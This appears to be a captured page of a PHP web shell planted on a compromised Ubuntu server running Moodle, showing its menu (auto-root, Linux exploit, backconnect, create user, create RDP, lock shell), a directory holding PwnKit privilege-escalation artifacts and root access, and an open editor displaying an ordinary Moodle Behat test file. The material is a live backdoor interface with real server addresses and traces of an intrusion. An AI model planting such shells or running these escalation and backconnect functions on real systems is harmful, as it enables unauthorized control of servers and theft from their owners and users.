Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
workshop /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
behat_mod_workshop.php
8.08
KB
-rwxrwxrwx
delete_submission.feature
4.38
KB
-rwxrwxrwx
embedded_images.feature
4.99
KB
-rwxrwxrwx
example_submission.feature
1.81
KB
-rwxrwxrwx
export_submission.feature
4.47
KB
-rwxrwxrwx
file_type_restriction.feature
6.25
KB
-rwxrwxrwx
grade_to_pass.feature
4.87
KB
-rwxrwxrwx
grading_strategy.feature
4.75
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
submission_types.feature
9.55
KB
-rwxrwxrwx
workshop_assessment.feature
8.63
KB
-rwxrwxrwx
workshop_late_submission.featu...
3.59
KB
-rwxrwxrwx
workshop_section_remembered.fe...
1.6
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : workshop_section_remembered.feature
@mod @mod_workshop Feature: Workshop should remember collapsed/expanded sections in view page. In order to keep the last state of collapsed/expanded sections in view page As an user I need to be able to choose collapsed/expanded, and after refresh the page it will display collapsed/expanded I chose before. Background: Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | | student1 | Student | 1 | student1@example.com | And the following "courses" exist: | fullname | shortname | | Course1 | c1 | And the following "course enrolments" exist: | user | course | role | | teacher1 | c1 | editingteacher | | student1 | c1 | student | And the following "activities" exist: | activity | name | course | idnumber | | workshop | Workshop 1 | c1 | workshop1 | @javascript Scenario: Check section in view page can be remembered. Given I am on the "Workshop 1" "workshop activity" page logged in as teacher1 When I change phase in workshop "Workshop 1" to "Submission phase" And I wait until the page is ready And I am on the "Workshop 1" "workshop activity" page logged in as student1 Then I should see "You have not submitted your work yet" And I click on "Your submission" "link" And I should not see "You have not submitted your work yet" And I reload the page And I wait until the page is ready And I should not see "You have not submitted your work yet"
Close